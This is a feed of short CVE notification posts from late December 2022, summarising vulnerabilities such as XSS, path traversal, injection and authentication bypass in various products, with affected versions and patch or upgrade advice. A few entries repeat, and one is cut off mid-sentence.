🚨 CVE-2021-4292A vulnerability was found in OpenMRS Admin UI Module up to 1.4.x. It has been rated as problematic. This issue affects some unknown processing of the file omod/src/main/webapp/pages/metadata/privileges/privilege.gsp of the component Manage Privilege Page. The manipulation leads to cross site scripting. The attack may be initiated remotely. Upgrading to version 1.5.0 is able to address this issue. The name of the patch is 4f8565425b7c74128dec9ca46dfbb9a3c1c24911. It is recommended to upgrade the affected component. The identifier VDB-216917 was assigned to this vulnerability.🎖@cveNotify |
|
| 2022-12-28 02:29:37 |
🚨 CVE-2022-4768A vulnerability was found in Dropbox merou. It has been classified as critical. Affected is the function add_public_key of the file grouper/public_key.py of the component SSH Public Key Handler. The manipulation of the argument public_key_str leads to injection. It is possible to launch the attack remotely. The name of the patch is d93087973afa26bc0a2d0a5eb5c0fde748bdd107. It is recommended to apply a patch to fix this issue. VDB-216906 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2022-12-28 02:29:36 |
🚨 CVE-2022-4772A vulnerability was found in Widoco and classified as critical. Affected by this issue is the function unZipIt of the file src/main/java/widoco/WidocoUtils.java. The manipulation leads to path traversal. It is possible to launch the attack on the local host. The name of the patch is f2279b76827f32190adfa9bd5229b7d5a147fa92. It is recommended to apply a patch to fix this issue. VDB-216914 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2022-12-28 00:29:59 |
🚨 CVE-2017-20146Usage of the CORS handler may apply improper CORS headers, allowing the requester to explicitly control the value of the Access-Control-Allow-Origin header, which bypasses the expected behavior of the Same Origin Policy.🎖@cveNotify |
|
| 2022-12-28 00:29:56 |
🚨 CVE-2018-25046Due to improper path santization, archives containing relative file paths can cause files to be written (or overwritten) outside of the target directory.🎖@cveNotify |
|
| 2022-12-28 00:29:55 |
🚨 CVE-2019-25072Due to support of Gzip compression in request bodies, as well as a lack of limiting response body sizes, a malicious server can cause a client to consume a significant amount of system resources, which may be used as a denial of service vector.🎖@cveNotify |
|
| 2022-12-28 00:29:54 |
🚨 CVE-2019-25073Improper path santiziation in github.com/goadesign/goa before v3.0.9, v2.0.10, or v1.4.3 allow remote attackers to read files outside of the intended directory.🎖@cveNotify |
|
| 2022-12-28 00:29:50 |
🚨 CVE-2020-36559Due to improper santization of user input, HTTPEngine.Handle allows for directory traversal, allowing an attacker to read files outside of the target directory that the server has permission to read.🎖@cveNotify |
|
| 2022-12-28 00:29:49 |
🚨 CVE-2020-36561Due to improper path santization, archives containing relative file paths can cause files to be written (or overwritten) outside of the target directory.🎖@cveNotify |
|
| 2022-12-28 00:29:48 |
🚨 CVE-2020-36564Due to improper validation of caller input, validation is silently disabled if the provided expected token is malformed, causing any user supplied token to be considered valid.🎖@cveNotify |
|
| 2022-12-28 00:29:47 |
🚨 CVE-2020-36566Due to improper path santization, archives containing relative file paths can cause files to be written (or overwritten) outside of the target directory.🎖@cveNotify |
|
| 2022-12-28 00:29:46 |
🚨 CVE-2020-36569Authentication is globally bypassed in github.com/nanobox-io/golang-nanoauth between v0.0.0-20160722212129-ac0cc4484ad4 and v0.0.0-20200131131040-063a3fb69896 if ListenAndServe is called with an empty token.🎖@cveNotify |
|
| 2022-12-28 00:29:45 |
🚨 CVE-2021-4235Due to unbounded alias chasing, a maliciously crafted YAML file can cause the system to consume significant system resources. If parsing user input, this may be used as a denial of service vector.🎖@cveNotify |
|
| 2022-12-28 00:29:44 |
🚨 CVE-2021-4236Web Sockets do not execute any AuthenticateMethod methods which may be set, leading to a nil pointer dereference if the returned UserData pointer is assumed to be non-nil, or authentication bypass. This issue only affects WebSockets with an AuthenticateMethod hook. Request handlers that do not explicitly use WebSockets are not vulnerable.🎖@cveNotify |
|
| 2022-12-28 00:29:42 |
🚨 CVE-2021-4238Randomly-generated alphanumeric strings contain significantly less entropy than expected. The RandomAlphaNumeric and CryptoRandomAlphaNumeric functions always return strings containing at least one digit from 0 to 9. This significantly reduces the amount of entropy in short strings generated by these functions.🎖@cveNotify |
|
| 2022-12-28 00:29:41 |
🚨 CVE-2021-4239The Noise protocol implementation suffers from weakened cryptographic security after encrypting 2^64 messages, and a potential denial of service attack. After 2^64 (~18.4 quintillion) messages are encrypted with the Encrypt function, the nonce counter will wrap around, causing multiple messages to be encrypted with the same key and nonce. In a separate issue, the Decrypt function increments the nonce state even when it fails to decrypt a message. If an attacker can provide an invalid input to the Decrypt function, this will cause the nonce state to desynchronize between the peers, resulting in a failure to encrypt all subsequent messages.🎖@cveNotify |
|
| 2022-12-28 00:29:39 |
🚨 CVE-2022-2582The AWS S3 Crypto SDK sends an unencrypted hash of the plaintext alongside the ciphertext as a metadata field. This hash can be used to brute force the plaintext, if the hash is readable to the attacker. AWS now blocks this metadata field, but older SDK versions still send it.🎖@cveNotify |
|
| 2022-12-28 00:29:38 |
🚨 CVE-2022-2583A race condition can cause incorrect HTTP request routing.🎖@cveNotify |
|
| 2022-12-28 00:29:37 |
🚨 CVE-2022-2584The dag-pb codec can panic when decoding invalid blocks.🎖@cveNotify |
|
| 2022-12-27 19:30:01 |
🚨 CVE-2022-45427Some Dahua software products have a vulnerability of unrestricted upload of file. After obtaining the permissions of administrators, by sending a specific crafted packet to the vulnerable interface, an attacker can upload arbitrary files.🎖@cveNotify |
|
| 2022-12-27 19:30:00 |
🚨 CVE-2022-45428Some Dahua software products have a vulnerability of sensitive information leakage. After obtaining the permissions of administrators, by sending a specific crafted packet to the vulnerable interface, an attacker can obtain the debugging information.🎖@cveNotify |
|
| 2022-12-27 19:29:59 |
🚨 CVE-2022-45429Some Dahua software products have a vulnerability of server-side request forgery (SSRF). An Attacker can access internal resources by concatenating links (URL) that conform to specific rules.🎖@cveNotify |
|
| 2022-12-27 19:29:57 |
🚨 CVE-2022-45430Some Dahua software products have a vulnerability of unauthenticated enable or disable SSHD service. After bypassing the firewall access control policy, by sending a specific crafted packet to the vulnerable interface, an attacker could enable or disable the SSHD service.🎖@cveNotify |
|
| 2022-12-27 19:29:56 |
🚨 CVE-2022-45431Some Dahua software products have a vulnerability of unauthenticated restart of remote DSS Server. After bypassing the firewall access control policy, by sending a specific crafted packet to the vulnerable interface, an attacker could unauthenticated restart of remote DSS Server.🎖@cveNotify |
|
| 2022-12-27 19:29:55 |
🚨 CVE-2022-45432Some Dahua software products have a vulnerability of unauthenticated search for devices. After bypassing the firewall access control policy, by sending a specific crafted packet to the vulnerable interface, an attacker could unauthenticated search for devices in range of IPs from remote DSS Server.🎖@cveNotify |
|
| 2022-12-27 19:29:53 |
🚨 CVE-2022-45433Some Dahua software products have a vulnerability of unauthenticated traceroute host from remote DSS Server. After bypassing the firewall access control policy, by sending a specific crafted packet to the vulnerable interface, an attacker could get the traceroute results.🎖@cveNotify |
|
| 2022-12-27 19:29:52 |
🚨 CVE-2022-45434Some Dahua software products have a vulnerability of unauthenticated un-throttled ICMP requests on remote DSS Server. After bypassing the firewall access control policy, by sending a specific crafted packet to the vulnerable interface, an attacker could exploit the victim server to launch ICMP request attack to the designated target host.🎖@cveNotify |
|
| 2022-12-27 19:29:51 |
🚨 CVE-2022-47968Heimdall Application Dashboard through 2.5.4 allows reflected XSS via "Application name" to the "Add application" page.🎖@cveNotify |
|
| 2022-12-27 19:29:49 |
🚨 CVE-2022-44940Patchelf v0.9 was discovered to contain an out-of-bounds read via the function modifyRPath at src/patchelf.cc.🎖@cveNotify |
|
| 2022-12-27 19:29:47 |
🚨 CVE-2021-4258** DISPUTED ** A vulnerability was found in whohas. It has been rated as problematic. This issue affects some unknown processing of the component Package Information Handler. The manipulation leads to cleartext transmission of sensitive information. The attack may be initiated remotely. The real existence of this vulnerability is still doubted at the moment. The name of the patch is 667c3e2e9178f15c23d7918b5db25cd0792c8472. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-216251. NOTE: Most sources redirect to the encrypted site which limits the possibilities of an attack.🎖@cveNotify |
|
| 2022-12-27 19:29:46 |
🚨 CVE-2020-36619A vulnerability was found in multimon-ng. It has been rated as critical. This issue affects the function add_ch of the file demod_flex.c. The manipulation of the argument ch leads to format string. Upgrading to version 1.2.0 is able to address this issue. The name of the patch is e5a51c508ef952e81a6da25b43034dd1ed023c07. It is recommended to upgrade the affected component. The identifier VDB-216269 was assigned to this vulnerability.🎖@cveNotify |
|
| 2022-12-27 19:29:45 |
🚨 CVE-2022-43466Buffalo network devices WSR-3200AX4S firmware Ver. 1.26 and earlier, WSR-3200AX4B firmware Ver. 1.25, WSR-2533DHP2 firmware Ver. 1.22 and earlier, WSR-A2533DHP2 firmware Ver. 1.22 and earlier, WSR-2533DHP3 firmware Ver. 1.26 and earlier, WSR-A2533DHP3 firmware Ver. 1.26 and earlier, WSR-2533DHPL2 firmware Ver. 1.03 and earlier, WSR-2533DHPLS firmware Ver. 1.07 and earlier, WEX-1800AX4 firmware Ver. 1.13 and earlier, and WEX-1800AX4EA firmware Ver. 1.13 and earlier allows a network-adjacent attacker with an administrative privilege to execute an arbitrary OS command if a specially crafted request is sent to a specific CGI program.🎖@cveNotify |
|
| 2022-12-27 19:29:43 |
🚨 CVE-2022-43443Buffalo network devices WSR-3200AX4S firmware Ver. 1.26 and earlier, WSR-3200AX4B firmware Ver. 1.25, WSR-2533DHP firmware Ver. 1.08 and earlier, WSR-2533DHP2 firmware Ver. 1.22 and earlier, WSR-A2533DHP2 firmware Ver. 1.22 and earlier, WSR-2533DHP3 firmware Ver. 1.26 and earlier, WSR-A2533DHP3 firmware Ver. 1.26 and earlier, WSR-2533DHPL firmware Ver. 1.08 and earlier, WSR-2533DHPL2 firmware Ver. 1.03 and earlier, WSR-2533DHPLS firmware Ver. 1.07 and earlier, and WCR-1166DS firmware Ver. 1.34 and earlier allows an network-adjacent attacker to execute an arbitrary OS command if a specially crafted request is sent to the management page.🎖@cveNotify |
|
| 2022-12-27 19:29:42 |
🚨 CVE-2021-4259A vulnerability was found in phpRedisAdmin up to 1.16.1. It has been classified as problematic. This affects the function authHttpDigest of the file includes/login.inc.php. The manipulation of the argument response leads to use of wrong operator in string comparison. Upgrading to version 1.16.2 is able to address this issue. The name of the patch is 31aa7661e6db6f4dffbf9a635817832a0a11c7d9. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-216267.🎖@cveNotify |
|
| 2022-12-27 19:29:41 |
🚨 CVE-2022-41993Cross-site scripting vulnerability in DENSHI NYUSATSU CORE SYSTEM v6 R4 and earlier allows a remote unauthenticated attacker to inject an arbitrary script.🎖@cveNotify |
|
| 2022-12-27 19:29:40 |
🚨 CVE-2022-2966Out-of-bounds Read vulnerability in Delta Electronics DOPSoft.This issue affects DOPSoft: All Versions.🎖@cveNotify |
|
| 2022-12-27 19:29:39 |
🚨 CVE-2022-41972Contiki-NG is an open-source, cross-platform operating system for Next-Generation IoT devices. Versions prior to 4.9 contain a NULL Pointer Dereference in BLE L2CAP module. The Contiki-NG operating system for IoT devices contains a Bluetooth Low Energy stack. An attacker can inject a packet in this stack, which causes the implementation to dereference a NULL pointer and triggers undefined behavior. More specifically, while processing the L2CAP protocol, the implementation maps an incoming channel ID to its metadata structure. In this structure, state information regarding credits is managed through calls to the function input_l2cap_credit in the module os/net/mac/ble/ble-l2cap.c. Unfortunately, the input_l2cap_credit function does not check that the metadata corresponding to the user-supplied channel ID actually exists, which can lead to the channel variable being set to NULL before a pointer dereferencing operation is performed. The vulnerability has been patched in the "develop" branch of Contiki-NG, and will be included in release 4.9. Users can apply the patch in Contiki-NG pull request #2253 as a workaround until the new package is released.🎖@cveNotify |
|
| 2022-12-27 19:29:38 |
🚨 CVE-2022-47577** DISPUTED ** An issue was discovered in the endpoint protection agent in Zoho ManageEngine Device Control Plus 10.1.2228.15. Despite configuring complete restrictions on USB pendrives, USB HDD devices, memory cards, USB connections to mobile devices, etc., it is still possible to bypass the USB restrictions by making use of a virtual machine (VM). This allows a file to be exchanged outside the laptop/system. VMs can be created by any user (even without admin rights). The data exfiltration can occur without any record in the audit trail of Windows events on the host machine. NOTE: the vendor's position is "it's not a vulnerability in our product."🎖@cveNotify |
|
| 2022-12-27 19:29:37 |
🚨 CVE-2022-47578** DISPUTED ** An issue was discovered in the endpoint protection agent in Zoho ManageEngine Device Control Plus 10.1.2228.15. Despite configuring complete restrictions on USB pendrives, USB HDD devices, memory cards, USB connections to mobile devices, etc., it is still possible to bypass the USB restrictions by booting into Safe Mode. This allows a file to be exchanged outside the laptop/system. Safe Mode can be launched by any user (even without admin rights). Data exfiltration can occur, and also malware might be introduced onto the system. NOTE: the vendor's position is "it's not a vulnerability in our product."🎖@cveNotify |
|
| 2022-12-27 18:29:57 |
🚨 CVE-2020-36626A vulnerability classified as critical has been found in Modern Tribe Panel Builder Plugin. Affected is the function add_post_content_filtered_to_search_sql of the file ModularContent/SearchFilter.php. The manipulation leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The name of the patch is 4528d4f855dbbf24e9fc12a162fda84ce3bedc2f. It is recommended to apply a patch to fix this issue. VDB-216738 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2022-12-27 18:29:56 |
🚨 CVE-2022-4691Cross-site Scripting (XSS) - Stored in GitHub repository usememos/memos prior to 0.9.0.🎖@cveNotify |
|
| 2022-12-27 18:29:55 |
🚨 CVE-2022-4695Cross-site Scripting (XSS) - Stored in GitHub repository usememos/memos prior to 0.9.0.🎖@cveNotify |
|
| 2022-12-27 18:29:54 |
🚨 CVE-2022-4719Business Logic Errors in GitHub repository ikus060/rdiffweb prior to 2.5.5.🎖@cveNotify |
|
| 2022-12-27 18:29:50 |
🚨 CVE-2022-4721Failure to Sanitize Special Elements into a Different Plane (Special Element Injection) in GitHub repository ikus060/rdiffweb prior to 2.5.5.🎖@cveNotify |
|
| 2022-12-27 18:29:49 |
🚨 CVE-2022-4722Authentication Bypass by Primary Weakness in GitHub repository ikus060/rdiffweb prior to 2.5.5.🎖@cveNotify |
|
| 2022-12-27 18:29:48 |
🚨 CVE-2022-4724Improper Access Control in GitHub repository ikus060/rdiffweb prior to 2.5.5.🎖@cveNotify |
|
| 2022-12-27 18:29:44 |
🚨 CVE-2022-4725A vulnerability was found in AWS SDK 2.59.0. It has been rated as critical. This issue affects the function XpathUtils of the file aws-android-sdk-core/src/main/java/com/amazonaws/util/XpathUtils.java of the component XML Parser. The manipulation leads to server-side request forgery. Upgrading to version 2.59.1 is able to address this issue. The name of the patch is c3e6d69422e1f0c80fe53f2d757b8df97619af2b. It is recommended to upgrade the affected component. The identifier VDB-216737 was assigned to this vulnerability.🎖@cveNotify |
|
| 2022-12-27 18:29:43 |
🚨 CVE-2022-4727A vulnerability, which was classified as problematic, was found in OpenMRS Appointment Scheduling Module up to 1.16.x. This affects the function getNotes of the file api/src/main/java/org/openmrs/module/appointmentscheduling/AppointmentRequest.java of the component Notes Handler. The manipulation of the argument notes leads to cross site scripting. It is possible to initiate the attack remotely. Upgrading to version 1.17.0 is able to address this issue. The name of the patch is 2ccbe39c020809765de41eeb8ee4c70b5ec49cc8. It is recommended to upgrade the affected component. The identifier VDB-216741 was assigned to this vulnerability.🎖@cveNotify |
|
| 2022-12-27 18:29:42 |
🚨 CVE-2022-4728A vulnerability has been found in Graphite Web and classified as problematic. This vulnerability affects unknown code of the component Cookie Handler. The manipulation leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The name of the patch is 2f178f490e10efc03cd1d27c72f64ecab224eb23. It is recommended to apply a patch to fix this issue. VDB-216742 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2022-12-27 18:29:41 |
🚨 CVE-2022-4729A vulnerability was found in Graphite Web and classified as problematic. This issue affects some unknown processing of the component Template Name Handler. The manipulation leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The name of the patch is 2f178f490e10efc03cd1d27c72f64ecab224eb23. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-216743.🎖@cveNotify |
|
| 2022-12-27 18:29:38 |
🚨 CVE-2022-4730A vulnerability was found in Graphite Web. It has been classified as problematic. Affected is an unknown function of the component Absolute Time Range Handler. The manipulation leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The name of the patch is 2f178f490e10efc03cd1d27c72f64ecab224eb23. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-216744.🎖@cveNotify |
|
| 2022-12-27 18:29:37 |
🚨 CVE-2022-4732Unrestricted Upload of File with Dangerous Type in GitHub repository microweber/microweber prior to 1.3.2.🎖@cveNotify |
|
| 2022-12-27 18:29:36 |
🚨 CVE-2022-4734Exposure of Sensitive Information to an Unauthorized Actor in GitHub repository usememos/memos prior to 0.9.1.🎖@cveNotify |
|
| 2022-12-27 18:29:35 |
🚨 CVE-2022-4767Denial of Service in GitHub repository usememos/memos prior to 0.9.1.🎖@cveNotify |
|
| 2022-12-27 16:29:59 |
🚨 CVE-2019-25090A vulnerability was found in FreePBX arimanager up to 13.0.5.3 and classified as problematic. Affected by this issue is some unknown functionality of the component Views Handler. The manipulation of the argument dataurl leads to cross site scripting. The attack may be launched remotely. Upgrading to version 13.0.5.4 is able to address this issue. The name of the patch is 199dea7cc7020d3c469a86a39fbd80f5edd3c5ab. It is recommended to upgrade the affected component. VDB-216878 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2022-12-27 16:29:58 |
🚨 CVE-2020-36633A vulnerability was found in moodle-block_sitenews 1.0. It has been classified as problematic. This affects the function get_content of the file block_sitenews.php. The manipulation leads to cross-site request forgery. It is possible to initiate the attack remotely. Upgrading to version 1.1 is able to address this issue. The name of the patch is cd18d8b1afe464ae6626832496f4e070bac4c58f. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-216879.🎖@cveNotify |
|
| 2022-12-27 16:29:55 |
🚨 CVE-2020-36634A vulnerability classified as problematic has been found in Indeed Engineering util up to 1.0.33. Affected is the function visit/appendTo of the file varexport/src/main/java/com/indeed/util/varexport/servlet/ViewExportedVariablesServlet.java. The manipulation leads to cross site scripting. It is possible to launch the attack remotely. Upgrading to version 1.0.34 is able to address this issue. The name of the patch is c0952a9db51a880e9544d9fac2a2218a6bfc9c63. It is recommended to upgrade the affected component. VDB-216882 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2022-12-27 16:29:52 |
🚨 CVE-2021-4288A vulnerability was found in OpenMRS openmrs-module-referenceapplication up to 2.11.x. It has been rated as problematic. This issue affects some unknown processing of the file omod/src/main/webapp/pages/userApp.gsp. The manipulation leads to cross site scripting. The attack may be initiated remotely. Upgrading to version 2.12.0 is able to address this issue. The name of the patch is 35f81901a4cb925747a9615b8706f5079d2196a1. It is recommended to upgrade the affected component. The identifier VDB-216881 was assigned to this vulnerability.🎖@cveNotify |
|
| 2022-12-27 16:29:50 |
🚨 CVE-2021-4289A vulnerability classified as problematic was found in OpenMRS openmrs-module-referenceapplication up to 2.11.x. Affected by this vulnerability is the function post of the file omod/src/main/java/org/openmrs/module/referenceapplication/page/controller/UserAppPageController.java of the component User App Page. The manipulation of the argument AppId leads to cross site scripting. The attack can be launched remotely. Upgrading to version 2.12.0 is able to address this issue. The name of the patch is 0410c091d46eed3c132fe0fcafe5964182659f74. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-216883.🎖@cveNotify |
|
| 2022-12-27 16:29:48 |
🚨 CVE-2022-4766A vulnerability was found in dolibarr_project_timesheet up to 4.5.5. It has been declared as problematic. This vulnerability affects unknown code of the component Form Handler. The manipulation leads to cross-site request forgery. The attack can be initiated remotely. Upgrading to version 4.5.6.a is able to address this issue. The name of the patch is 082282e9dab43963e6c8f03cfaddd7921de377f4. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-216880.🎖@cveNotify |
|
| 2022-12-27 16:29:44 |
🚨 CVE-2021-4285A vulnerability classified as problematic was found in Nagios NCPA. This vulnerability affects unknown code of the file agent/listener/templates/tail.html. The manipulation of the argument name leads to cross site scripting. The attack can be initiated remotely. Upgrading to version 2.4.0 is able to address this issue. The name of the patch is 5abbcd7aa26e0fc815e6b2b0ffe1c15ef3e8fab5. It is recommended to upgrade the affected component. VDB-216874 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2022-12-27 16:29:39 |
🚨 CVE-2021-4286A vulnerability, which was classified as problematic, has been found in cocagne pysrp up to 1.0.16. This issue affects the function calculate_x of the file srp/_ctsrp.py. The manipulation leads to information exposure through discrepancy. Upgrading to version 1.0.17 is able to address this issue. The name of the patch is dba52642f5e95d3da7af1780561213ee6053195f. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-216875.🎖@cveNotify |
|
| 2022-12-27 16:29:36 |
🚨 CVE-2021-4287A vulnerability, which was classified as problematic, was found in ReFirm Labs binwalk up to 2.3.2. Affected is an unknown function of the file src/binwalk/modules/extractor.py of the component Archive Extraction Handler. The manipulation leads to symlink following. It is possible to launch the attack remotely. Upgrading to version 2.3.3 is able to address this issue. The name of the patch is fa0c0bd59b8588814756942fe4cb5452e76c1dcd. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-216876.🎖@cveNotify |
|
| 2022-12-27 13:29:39 |
🚨 CVE-2019-25089A vulnerability has been found in Morgawr Muon 0.1.1 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file src/muon/handler.clj. The manipulation leads to insufficiently random values. The attack can be launched remotely. Upgrading to version 0.2.0-indev is able to address this issue. The name of the patch is c09ed972c020f759110c707b06ca2644f0bacd7f. It is recommended to upgrade the affected component. The identifier VDB-216877 was assigned to this vulnerability.🎖@cveNotify |
|
| 2022-12-27 13:29:38 |
🚨 CVE-2021-4285A vulnerability classified as problematic was found in Nagios NCPA. This vulnerability affects unknown code of the file agent/listener/templates/tail.html. The manipulation of the argument name leads to cross site scripting. The attack can be initiated remotely. Upgrading to version 2.4.0 is able to address this issue. The name of the patch is 5abbcd7aa26e0fc815e6b2b0ffe1c15ef3e8fab5. It is recommended to upgrade the affected component. VDB-216874 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2022-12-27 13:29:37 |
🚨 CVE-2021-4287A vulnerability, which was classified as problematic, was found in ReFirm Labs binwalk up to 2.3.2. Affected is an unknown function of the file src/binwalk/modules/extractor.py of the component Archive Extraction Handler. The manipulation leads to symlink following. It is possible to launch the attack remotely. Upgrading to version 2.3.3 is able to address this issue. The name of the patch is fa0c0bd59b8588814756942fe4cb5452e76c1dcd. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-216876.🎖@cveNotify |
|
| 2022-12-27 12:29:52 |
🚨 CVE-2019-25088A vulnerability was found in ytti Oxidized Web. It has been classified as problematic. Affected is an unknown function of the file lib/oxidized/web/views/conf_search.haml. The manipulation of the argument to_research leads to cross site scripting. It is possible to launch the attack remotely. The name of the patch is 55ab9bdc68b03ebce9280b8746ef31d7fdedcc45. It is recommended to apply a patch to fix this issue. VDB-216870 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2022-12-27 12:29:51 |
🚨 CVE-2021-4282A vulnerability was found in FreePBX voicemail. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file page.voicemail.php. The manipulation leads to cross site scripting. The attack can be launched remotely. Upgrading to version 14.0.6.25 is able to address this issue. The name of the patch is 12e1469ef9208eda9d8955206e78345949236ee6. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-216871.🎖@cveNotify |
|
| 2022-12-27 12:29:50 |
🚨 CVE-2021-4283A vulnerability was found in FreeBPX voicemail. It has been rated as problematic. Affected by this issue is some unknown functionality of the file views/ssettings.php of the component Settings Handler. The manipulation of the argument key leads to cross site scripting. The attack may be launched remotely. Upgrading to version 14.0.6.25 is able to address this issue. The name of the patch is ffce4882016076acd16fe0f676246905aa3cb2f3. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-216872.🎖@cveNotify |
|
| 2022-12-27 12:29:48 |
🚨 CVE-2021-4284A vulnerability classified as problematic has been found in OpenMRS HTML Form Entry UI Framework Integration Module up to 1.x. This affects an unknown part. The manipulation leads to cross site scripting. It is possible to initiate the attack remotely. Upgrading to version 2.0.0 is able to address this issue. The name of the patch is 811990972ea07649ae33c4b56c61c3b520895f07. It is recommended to upgrade the affected component. The identifier VDB-216873 was assigned to this vulnerability.🎖@cveNotify |
|
| 2022-12-27 12:29:47 |
🚨 CVE-2022-4755A vulnerability was found in FlatPress and classified as problematic. This issue affects the function main of the file fp-plugins/mediamanager/panels/panel.mediamanager.file.php of the component Media Manager Plugin. The manipulation of the argument mm-newgallery-name leads to cross site scripting. The attack may be initiated remotely. The name of the patch is d3f329496536dc99f9707f2f295d571d65a496f5. It is recommended to apply a patch to fix this issue. The identifier VDB-216869 was assigned to this vulnerability.🎖@cveNotify |
|
| 2022-12-27 12:29:46 |
🚨 CVE-2015-10005A vulnerability was found in markdown-it up to 2.x. It has been classified as problematic. Affected is an unknown function of the file lib/common/html_re.js. The manipulation leads to inefficient regular expression complexity. Upgrading to version 3.0.0 is able to address this issue. The name of the patch is 89c8620157d6e38f9872811620d25138fc9d1b0d. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-216852.🎖@cveNotify |
|
| 2022-12-27 12:29:45 |
🚨 CVE-2018-25049A vulnerability was found in email-existence. It has been rated as problematic. Affected by this issue is some unknown functionality of the file index.js. The manipulation leads to inefficient regular expression complexity. The name of the patch is 0029ba71b6ad0d8ec0baa2ecc6256d038bdd9b56. It is recommended to apply a patch to fix this issue. VDB-216854 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2022-12-27 12:29:41 |
🚨 CVE-2019-25086A vulnerability was found in IET-OU Open Media Player up to 1.5.0. It has been declared as problematic. This vulnerability affects the function webvtt of the file application/controllers/timedtext.php. The manipulation of the argument ttml_url leads to cross site scripting. The attack can be initiated remotely. Upgrading to version 1.5.1 is able to address this issue. The name of the patch is 3f39f2d68d11895929c04f7b49b97a734ae7cd1f. It is recommended to upgrade the affected component. VDB-216862 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2022-12-27 12:29:40 |
🚨 CVE-2019-25087A vulnerability was found in RamseyK httpserver. It has been rated as critical. This issue affects the function ResourceHost::getResource of the file src/ResourceHost.cpp of the component URI Handler. The manipulation of the argument uri leads to path traversal: '../filedir'. The attack may be initiated remotely. The name of the patch is 1a0de56e4dafff9c2f9c8f6b130a764f7a50df52. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-216863.🎖@cveNotify |
|
| 2022-12-27 12:29:39 |
🚨 CVE-2022-4748A vulnerability was found in FlatPress. It has been classified as critical. This affects the function doItemActions of the file fp-plugins/mediamanager/panels/panel.mediamanager.file.php of the component File Delete Handler. The manipulation of the argument deletefile leads to path traversal. The name of the patch is 5d5c7f6d8f072d14926fc2c3a97cdd763802f170. It is recommended to apply a patch to fix this issue. The identifier VDB-216861 was assigned to this vulnerability.🎖@cveNotify |
|
| 2022-12-27 12:29:38 |
🚨 CVE-2022-40897Python Packaging Authority (PyPA) setuptools before 65.5.1 allows remote attackers to cause a denial of service via HTML in a crafted package or custom PackageIndex page. There is a Regular Expression Denial of Service (ReDoS) in package_index.py.🎖@cveNotify |
|
| 2022-12-27 12:29:37 |
🚨 CVE-2021-31875** DISPUTED ** In mjs_json.c in Cesanta MongooseOS mJS 1.26, a maliciously formed JSON string can trigger an off-by-one heap-based buffer overflow in mjs_json_parse, which can potentially lead to redirection of control flow. NOTE: the original reporter disputes the significance of this finding because "there isn’t very much of an opportunity to exploit this reliably for an information leak, so there isn’t any real security impact."🎖@cveNotify |
|
| 2022-12-27 06:29:43 |
🚨 CVE-2022-46340A vulnerability was found in X.Org. This security flaw occurs becuase the swap handler for the XTestFakeInput request of the XTest extension may corrupt the stack if GenericEvents with lengths larger than 32 bytes are sent through a the XTestFakeInput request. This issue can lead to local privileges elevation on systems where the X server is running privileged and remote code execution for ssh X forwarding sessions. This issue does not affect systems where client and server use the same byte order.🎖@cveNotify |
|
| 2022-12-27 06:29:39 |
🚨 CVE-2022-46342A vulnerability was found in X.Org. This security flaw occurs because the handler for the XvdiSelectVideoNotify request may write to memory after it has been freed. This issue can lead to local privileges elevation on systems where the X se🎖@cveNotify |
|
| 2022-12-27 06:29:38 |
🚨 CVE-2022-46343A vulnerability was found in X.Org. This security flaw occurs because the handler for the ScreenSaverSetAttributes request may write to memory after it has been freed. This issue can lead to local privileges elevation on systems where the X server is running privileged and remote code execution for ssh X forwarding sessions.🎖@cveNotify |
|
| 2022-12-27 06:29:37 |
🚨 CVE-2022-4283A vulnerability was found in X.Org. This security flaw occurs because the XkbCopyNames function left a dangling pointer to freed memory, resulting in out-of-bounds memory access on subsequent XkbGetKbdByName requests.. This issue can lead to local privileges elevation on systems where the X server is running privileged and remote code execution for ssh X forwarding sessions.🎖@cveNotify |
|
| 2022-12-27 02:29:48 |
🚨 CVE-2020-10650A deserialization flaw was discovered in jackson-databind through 2.9.10.4. It could allow an unauthenticated user to perform code execution via ignite-jta or quartz-core: org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup, org.apache.ignite.cache.jta.jndi.CacheJndiTmFactory, and org.quartz.utils.JNDIConnectionProvider.🎖@cveNotify |
|
| 2022-12-27 02:29:47 |
🚨 CVE-2022-29153HashiCorp Consul and Consul Enterprise up to 1.9.16, 1.10.9, and 1.11.4 may allow server side request forgery when the Consul client agent follows redirects returned by HTTP health check endpoints. Fixed in 1.9.17, 1.10.10, and 1.11.5.🎖@cveNotify |
|
| 2022-12-27 02:29:46 |
🚨 CVE-2021-24119In Trusted Firmware Mbed TLS 2.24.0, a side-channel vulnerability in base64 PEM file decoding allows system-level (administrator) attackers to obtain information about secret RSA keys via a controlled-channel and side-channel attack on software running in isolated environments that can be single stepped, especially Intel SGX.🎖@cveNotify |
|
| 2022-12-27 02:29:44 |
